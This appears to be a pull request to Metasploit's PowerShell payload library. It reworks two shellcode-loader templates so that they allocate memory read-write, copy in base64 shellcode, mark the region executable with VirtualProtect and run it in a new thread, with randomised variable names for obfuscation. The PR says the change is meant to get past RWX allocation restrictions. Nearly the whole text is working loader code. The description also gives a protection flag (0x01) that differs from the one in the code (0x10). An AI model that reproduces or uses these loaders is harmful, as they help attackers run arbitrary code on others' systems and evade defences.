### PR TITLE
Feature mem w or x

### DIFF
--- a/data/templates/to_mem_dotnet.ps1.template
+++ b/data/templates/to_mem_dotnet.ps1.template
@@ -5,9 +5,10 @@ $%{var_syscode} = @"
 	namespace %{var_kernel32} {
 		public class func {
 			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
-			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
 			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
 			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
 			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
 		}
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
 $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+[Uint32]$%{var_opf} = 0
 
-$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
 if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
 [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
-[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
-$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+
+if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
+	[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+	if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+	$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
+}

--- a/data/templates/to_mem_pshreflection.ps1.template
+++ b/data/templates/to_mem_pshreflection.ps1.template
@@ -1,27 +1,29 @@
 function %{func_get_proc_address} {
-	Param ($%{var_module}, $%{var_procedure})		
-	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
-	
-	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+        Param ($%{var_module}, $%{var_procedure})
+        $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+
+        return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
 }
 
 function %{func_get_delegate_type} {
-	Param (
-		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
-		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
-	)
-	
-	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
-	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
-	
-	return $%{var_type_builder}.CreateType()
+        Param (
+                [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+                [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+        )
+
+        $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+        $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+        $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+
+        return $%{var_type_builder}.CreateType()
 }
 
 [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
-		
-$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
-[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+[Uint32]$%{var_opf} = 0
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
 
-$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
+        $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+        [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
+}

--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -36,10 +36,10 @@ module Payload
   def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
     hash_sub = {}
     hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_win32_func]	        = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_rwx] 		        = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx]			= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 

--- a/lib/rex/powershell/payload.rb
+++ b/lib/rex/powershell/payload.rb
@@ -36,10 +36,10 @@ module Payload
   def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
     hash_sub = {}
     hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_win32_func]	= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_win32_func]	        = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_rwx] 		        = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
 
@@ -54,7 +54,6 @@ module Payload
   # Originally from PowerSploit
   #
   def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
-    # Intialize rig and value names
     rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
     rig.init_var(:func_get_proc_address)
     rig.init_var(:func_get_delegate_type)


### PR DESCRIPTION
64bit processes under Win2016 appear to despise RWX allocations.
This branch contains work addressing the PSH side of unmanaged memory allocations for current injection methods (probably will not touch the psh_old template as its really designed for XP on PSHv1).
Initial PR contains the rig changes adding new variables for old protection flags and a rework of the PSH reflection template allocating memory as RW (0x04) then marking it executable (0x01) after copying shellcode into the RW buffer. Creation of the execution thread is predicated on success of the executable protection setting.
.NET to follow.